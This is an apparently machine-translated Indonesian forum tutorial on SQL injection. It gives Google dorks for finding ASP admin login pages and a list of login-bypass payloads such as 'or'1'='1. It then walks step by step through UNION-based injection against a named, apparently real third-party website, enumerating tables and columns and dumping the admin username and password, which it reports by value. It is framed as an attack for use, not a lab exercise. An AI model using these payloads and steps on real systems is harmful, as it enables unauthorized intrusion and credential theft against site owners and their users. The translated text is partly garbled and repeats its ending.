Halo setiap orang.
Saya akan berbagi dengan salah satu yang terbaik dari tutorial saya di sini.
Sekarang Mari kita mulai!
Sql injection (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk mengeksploitasi atau meretas website. Hal ini mudah dilakukan dan merupakan titik awal dari yang besar. Sayangnya kebanyakan sqli tutorial mengisap, jadi itu sebabnya saya menulis satu ini. Sqli hanya pada dasarnya menyuntikkan query ke dalam database atau menggunakan query untuk mendapatkan memotong otorisasi sebagai admin.
Hal yang harus Anda ketahui:
Data dalam kolom dan kolom dalam tabel dan tabel dalam database.
Hanya ingat bahwa begitu Anda memahami sisanya.
BAGIAN 1
Melewati admin login
Mendapatkan memotong auth pada account admin.
Kebanyakan situs rentan terhadap ini. Asp
Pertama kita perlu 2 menemukan situs, mulai dengan membuka google.
Sekarang kita ketik dork kami:. "Defenition of dork" 'entri pencarian untuk jenis tertentu dari situs / mengeksploitasi dll "
Ada sejumlah besar dork google untuk injeksi sql dasar.
di sini adalah yang terbaik:
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"Sekarang apa yang harus dilakukan setelah kita mendapatkan ke situs kami.
situs harus terlihat seperti ini:
USERNAME ADMIN:
PASSWORD:
jadi apa yang kita lakukan di sini adalah username kita selalu ketik "Admin"
dan untuk password kita ketik sql injection kami
di sini adalah daftar sql suntikan
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'Jadi masukan Anda akan terlihat seperti ini
Username: Admin
Sandi: 'or'1' = '1
yang akan membingungkan situs dan memberikan otorisasi untuk masuk sebagai admin
Jika situs rentan daripada Anda berada di
BAGIAN 2
Mencari Situs untuk Inject
Mencari SQLI Rentan duduk sangat mudah semua yang perlu Anda lakukan adalah beberapa Googling. Hal pertama yang perlu Anda lakukan adalah menemukan beberapa dorks.
Ambil SQLI daftar dorks dari sini: http://zyan.me/UVkJP
PS: Saya tidak menempatkan mereka di thread karena saya melewati batas hitungan ...
Pilih salah satu dorks dan menambahkan inurl: sebelum (Jika mereka belum memiliki itu) dan kemudian salin dan tempel ke google. Pilih salah satu situs dari google dan pergi untuk itu.
Misalnya url dari halaman Anda berada di mungkin terlihat seperti ini:
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
Untuk memeriksa bahwa itu adalah rentan yang harus Anda lakukan adalah menambahkan '
Jadi link kami akan terlihat seperti itu:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'
Tekan enter dan Anda mendapatkan beberapa jenis kesalahan. Kesalahan akan bervariasi ...
![[Image: vulnerrorcopy.jpg]](http://imageshack.us/a/img20/3218/vulnerrorcopy.jpg)
Setelah Anda menemukan situs Anda rentan langkah pertama yang perlu Anda ambil adalah untuk menemukan jumlah kolom. Cara termudah untuk melakukan ini adalah menulis "order by" kolom nomor dan kami menambahkan "-" setelah nomor.
Link kami harus seperti itu:
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
Jika Anda mendapatkan error yang berarti Anda harus menurunkan jumlah kolom.
Mari kita coba 10.
Kita harus mendapatkan nomor.
![[Image: dbversioncopy.jpg]](http://imageshack.us/a/img248/1435/dbversioncopy.jpg)
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
Halaman dibuka secara normal itu berarti jumlah kolom adalah antara 10 dan 14.
Kami coba sekarang 11.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
Halaman dibuka biasanya terlalu ...
Mari kita coba 12.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
Kami punya kesalahan. Itu berarti jumlah kolom adalah 11 karena kita punya kesalahan pada 12 dan 11 dibuka secara normal.
Menemukan Kolom diakses
Sekarang bahwa kita memiliki jumlah kolom yang kita butuhkan untuk mendapatkan nomor kolom yang kita bisa ambil informasi dari.
Kita dapat melakukannya dengan menambahkan "-" sebelum "10" menggantikan "order by #" dengan "serikat semua pilih" dan nomor kolom
Link kami harus seperti itu:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
Kita harus mendapatkan nomor.
Untuk bagian akhir url, (1,2,3,4,5,6,7,8,9,10,11) Anda menempatkan jumlah kolom yang Anda temukan pada langkah pertama. Karena saya menemukan bahwa situs saya sedang menguji memiliki 11 kolom, saya menempatkan 1,2,3,4,5,6,7,8,9,10,11 -
Angka-angka ini adalah nomor Colum kita bisa mendapatkan informasi dari. Kami akan menggantinya nanti dengan sesuatu yang lain sehingga menuliskannya jika Anda ingin.
Mendapatkan Versi database
Kami menemukan bahwa kolom 8, 3, 4 dan 5 adalah rentan jadi kita akan menggunakannya untuk mendapatkan versi database.
Mengapa Kita Lakukan Itu?
Jika database di bawah 5 itu berarti kita akan harus menebak nama tabel
Untuk melakukan itu kita perlu mengganti salah satu kolom rentan dengan "@ @ verion"
Mari kita kolom 8.
Link kami harus seperti itu:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
Sekarang kita perlu untuk mendapatkan nama tabel kita ingin mengakses:
Untuk melakukannya kita perlu mengganti "@ @ version" dengan "table_name" dan menambahkan setelah nomor kolom terakhir "dari information_schema.tables" dan menambahkan "-" pada akhirnya.
Link harus seperti itu:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
![[Image: tablenamescopy.jpg]](http://imageshack.us/a/img545/1254/tablenamescopy.jpg)
Sekarang kita akan mencari tabel kita ingin mengakses.
Kita harus baik-baik saja sesuatu dengan admin di atasnya dan dalam kasus kami itu tbladmin
![[Image: tblhcopy.jpg]](http://imageshack.us/a/img20/5822/tblhcopy.jpg)
Sekarang kita perlu untuk mendapatkan nilai ASCII dari "tbladmin".
Apa itu ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Sekarang untuk mendapatkan nilai ASCII dari "tbladmin" masuk ke situs tersebut: http://getyourwebsitehere.com/jswb/text_to_ascii.html
![[Image: acsii1copy.jpg]](http://imageshack.us/a/img37/3403/acsii1copy.jpg)
Sekarang masukkan dalam kotak pertama nama tabel yang adalah "tbladmin" dalam kasus kami dan klik dikonversi ke ASCII.
Anda akan mendapatkan nilai yang:
![[Image: acsii2copy.jpg]](http://imageshack.us/a/img823/3871/acsii2copy.jpg)
Sekarang kita ganti
dalam URL yang "table_name" ke "column_name" dan mengubah "information_schema.tables" ke "information_schema.columns dan menambahkan" mana nama_tabel = char (nilai ASCII) -
![[Image: columnsmcopy.jpg]](http://imageshack.us/a/img856/5987/columnsmcopy.jpg)
Code:
tbladmin
Sekarang menghapus karakter sebagai & #, dan kami menambahkan koma "," di antara setiap nomor.
Ini harus seperti itu:
Code:
116,98,108,97,100,109,105,110Sekarang kita ganti dalam URL yang "table_name" ke "column_name" dan mengubah "information_schema.tables" ke "information_schema.columns dan menambahkan" mana nama_tabel = char (nilai ASCII) -
dalam kasus kami di tempat (nilai ASCII) kami menempatkan (116,98,108,97,100,109,105,110) -
URL kami akan terlihat seperti itu:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
Sekarang kita mencari kolom bernama "username" dan "password" atau sesuatu seperti itu.
Dalam kasus kami itu adalah "username" dan "password".
Sekarang kita dapat menghapus sebagian besar URL.
Hapus semuanya setelah 11 dan menambahkan: "dari tbladmin" Dan ganti "nama_kolom" dengan "concat (username, 0x3a, password)
0x3a adalah nilai ASCII dari: sehingga kita dapat memisahkan nama pengguna dari password.
URL kami akan terlihat seperti itu:
Dan Anda sudah selesai username dan kata sandi ishir ishir123
Beberapa kali sandi dienkripsi dengan hash.
Gunakan detektor Hash saya untuk tahu apa itu dan mendekripsi online.
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
Beberapa kali sandi dienkripsi dengan hash.
Gunakan detektor Hash saya untuk tahu apa itu dan mendekripsi online.